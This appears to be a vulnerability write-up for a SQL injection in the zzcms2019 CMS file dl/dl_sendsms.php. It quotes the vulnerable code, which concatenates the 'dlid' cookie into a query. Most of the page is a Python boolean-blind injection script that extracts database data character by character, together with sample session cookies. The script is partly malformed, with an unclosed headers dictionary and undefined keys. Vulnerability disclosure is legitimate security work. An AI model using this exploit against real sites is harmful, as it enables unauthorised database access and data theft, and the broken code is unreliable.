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98 lines (73 loc) · 3.01 KB

zzcms2019 SQL injection vulnerability in

File metadata and controls

98 lines (73 loc) · 3.01 KB

zzcms2019 SQL injection vulnerability in dl_sendsms.php

Local setup environment for testing (no special environmental requirements)

The vulnerability is located at line 74 of /dl/ dl_sendsm.php, with the following partial code

if (strpos(@$_COOKIE['dlid'],",")>0){
$sql="select tel from zzcms_dl where passed=1 and id in (".@$_COOKIE['dlid'].") order by id asc limit $n,$size";
$sql="select tel from zzcms_dl where passed=1  and id='".@$_COOKIE['dlid']."'";

If the cookie in the first SQL statement is directly spelled into the statement without single quotation marks, you don't need to worry about escaping the cookie from zzcms2019, just use Boolean blind injection without single quotation marks

The front desk registered a new account, the type is the company type, because it is a test environment, there is no data, so first go to the user center email/SMS content Settings to add email/SMS content email and set it as the default

Normal access to /dl/dl_sendsm.php is shown below

Payload for cookie injection is as follows

Use exp for Boolean blind injection

#coding: utf-8
import requests
import string

url = 'http://{}/dl/dl_sendsms.php'

#header 头,自己根据实际环境做修改
headers = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept-Encoding':'gzip, deflate',

def Sqli(host,sql):
	global url
	global headers
	url = url.format(host)
	sqli = "ascii(substr(({}),{},1)))={}"
	sqli_2 = "0,(if((({}),1,0)))#"
	res_data = ""
	s = requests.session()
	i = 1
	while 1:
		tmp_data = res_data
		for c in string.printable:
			tmp_header = headers['Cookie']
			sqli_data = sqli_2.format(sqli.format(sql,str(i),ord(c)))
			headers['Cookie'] = headers['Cookie'] + "; dlid=" + sqli_data
			res = s.get(url, headers=headers)
			if "refresh" in res.text: #自己根据实际环境做修改
				headers['Cookie'] = tmp_header
				res_data += c
				print (res_data)
			headers['Cookie'] = tmp_header
		i += 1
		if tmp_data == res_data:
			print ('完成')

if __name__ == "__main__":
	#设置 host 地址
	host = ""
	#设置用户 cookie
	user_cookie = "PHPSESSID=dh6bhd10g47tjc4jlhqf2leqnn; UserName=test; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
	sql = "select group_concat(user(),version(),@@version_compile_os)"
	headers['Host'] = headers['Host'].format(host)
	headers['Cookie'] = headers['Cookie'].format(user_cookie)

The injection results are as follows